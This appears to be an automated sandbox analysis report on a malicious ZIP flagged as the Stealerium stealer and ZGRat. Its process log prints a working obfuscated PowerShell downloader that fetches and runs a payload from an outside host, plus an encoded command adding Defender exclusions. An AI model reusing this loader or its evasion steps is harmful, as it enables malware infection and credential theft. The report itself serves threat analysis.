Analysis Overview
SHA256
84765d5c0c038297793d431f04f2096bfce69ca41c50696c36bc0f3ba1369c05
Threat Level: Known bad
The file magic.poisontoolz.com.zip was found to be: Known bad.
Malicious Activity Summary
Stealerium
ZGRat
Detect ZGRat V1
Blocklisted process makes network request
Downloads MZ/PE file
Drops startup file
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
Enumerates connected drives
Looks up external IP address via web service
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Suspicious use of FindShellTrayWindow
outlook_office_path
Suspicious behavior: EnumeratesProcesses
outlook_win_path
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Checks processor information in registry
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-19 20:19
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral10
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
93s
Max time network
149s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Jafxaspdhim.vdf
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:24
Platform
win10v2004-20231215-en
Max time kernel
156s
Max time network
174s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\yagacrypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\yagacrypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ggiac.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ggiac.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4080 set thread context of 556 | N/A | C:\Users\Admin\AppData\Roaming\yagacrypt.exe | C:\Users\Admin\AppData\Roaming\yagacrypt.exe |
| PID 3152 set thread context of 1592 | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe |
| PID 1592 set thread context of 1092 | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
| PID 1092 set thread context of 1708 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
| PID 3416 set thread context of 3460 | N/A | C:\Users\Admin\AppData\Local\Temp\ggiac.exe | C:\Users\Admin\AppData\Local\Temp\ggiac.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\yagacrypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\yagacrypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ggiac.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ggiac.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\fox.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hPhLUO($gYYfVUqro, $TDHCoMacW){[IO.File]::WriteAllBytes($gYYfVUqro, $TDHCoMacW)};function OuyjBhDPrdGwPbLI($gYYfVUqro){if($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38832,38840,38840))) -eq $True){rundll32.exe $gYYfVUqro }elseif($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38844,38847,38781))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $gYYfVUqro}elseif($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38841,38847,38837))) -eq $True){misexec /qn /i $gYYfVUqro}else{Start-Process $gYYfVUqro}};function wZPwXqcGcNksDcvtMGB($uyaYBkDZCCSyzJDelsei){$iFRLJMGtgESMZFs = New-Object (bGYiXoWxyxIAMYfHnL @(38810,38833,38848,38778,38819,38833,38830,38799,38840,38837,38833,38842,38848));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$TDHCoMacW = $iFRLJMGtgESMZFs.DownloadData($uyaYBkDZCCSyzJDelsei);return $TDHCoMacW};function bGYiXoWxyxIAMYfHnL($NWBOMT){$RZDKPliAxJ=38732;$BhXTohPOo=$Null;foreach($eKsxkGZtQqIkdSPR in $NWBOMT){$BhXTohPOo+=[char]($eKsxkGZtQqIkdSPR-$RZDKPliAxJ)};return $BhXTohPOo};function gNBuaXtjuReBmDfHma(){$hIYbSEpsSJoZXPH = $env:AppData + '\';$YQPfBhOhZMdWRyHeqKPdf = $hIYbSEpsSJoZXPH + 'RIB.pdf';If(Test-Path -Path $YQPfBhOhZMdWRyHeqKPdf){Invoke-Item $YQPfBhOhZMdWRyHeqKPdf;}Else{ $arPZzcSlEyncTeAIE = wZPwXqcGcNksDcvtMGB (bGYiXoWxyxIAMYfHnL @(38836,38848,38848,38844,38847,38790,38779,38779,38841,38829,38835,38837,38831,38778,38844,38843,38837,38847,38843,38842,38848,38843,38843,38840,38854,38778,38831,38843,38841,38779,38814,38805,38798,38778,38844,38832,38834));hPhLUO $YQPfBhOhZMdWRyHeqKPdf $arPZzcSlEyncTeAIE;Invoke-Item $YQPfBhOhZMdWRyHeqKPdf;};$RYunDk = $hIYbSEpsSJoZXPH + 'yagacrypt.exe'; if (Test-Path -Path $RYunDk){OuyjBhDPrdGwPbLI $RYunDk;}Else{ $ehQGZXVzn = wZPwXqcGcNksDcvtMGB (bGYiXoWxyxIAMYfHnL @(38836,38848,38848,38844,38847,38790,38779,38779,38841,38829,38835,38837,38831,38778,38844,38843,38837,38847,38843,38842,38848,38843,38843,38840,38854,38778,38831,38843,38841,38779,38853,38829,38835,38829,38831,38846,38853,38844,38848,38778,38833,38852,38833));hPhLUO $RYunDk $ehQGZXVzn;OuyjBhDPrdGwPbLI $RYunDk;};;;;}gNBuaXtjuReBmDfHma;
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\RIB.pdf"
C:\Users\Admin\AppData\Roaming\yagacrypt.exe
"C:\Users\Admin\AppData\Roaming\yagacrypt.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0C7AA00897205B0621305857D4844299 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4E8D65E53F52C2E793C436F7B299ADBD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4E8D65E53F52C2E793C436F7B299ADBD --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3FDE9A082A75A0F1B85D6E2E64451CD6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3FDE9A082A75A0F1B85D6E2E64451CD6 --renderer-client-id=4 --mojo-platform-channel-handle=2284 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=52B0186A564DE3CD6194553D4ACAB064 --mojo-platform-channel-handle=2548 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=73AC7C45C0CF6A5E20EAE9DA9193AB63 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3261FE8E9A19406519F4ABADEEF0918A --mojo-platform-channel-handle=2596 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Users\Admin\AppData\Roaming\yagacrypt.exe
C:\Users\Admin\AppData\Roaming\yagacrypt.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Users\Admin\AppData\Local\Temp\ggiac.exe
C:\Users\Admin\AppData\Local\Temp\ggiac.exe
C:\Users\Admin\AppData\Local\Temp\ggiac.exe
C:\Users\Admin\AppData\Local\Temp\ggiac.exe
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 5.179.17.96.in-addr.arpa | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.114.59.183:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.166.126.56:443 | | tcp |
| GB | 23.37.0.169:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.114.59.183:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.114.59.183:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| GB | 104.77.160.14:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 93.184.221.240:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.17.179.41:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 58.189.79.40.in-addr.arpa | udp |
| FR | 194.33.191.53:58001 | | tcp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 53.191.33.194.in-addr.arpa | udp |
| FR | 194.33.191.53:58001 | | tcp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
Files
memory/1868-3-0x0000000004D20000-0x0000000004D30000-memory.dmp
memory/1868-2-0x0000000004D20000-0x0000000004D30000-memory.dmp
memory/1868-1-0x0000000071570000-0x0000000071D20000-memory.dmp
memory/1868-4-0x0000000005360000-0x0000000005988000-memory.dmp
memory/1868-0-0x00000000028C0000-0x00000000028F6000-memory.dmp
memory/1868-5-0x0000000005230000-0x0000000005252000-memory.dmp
memory/1868-12-0x0000000005BA0000-0x0000000005C06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0naqnljo.j0i.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
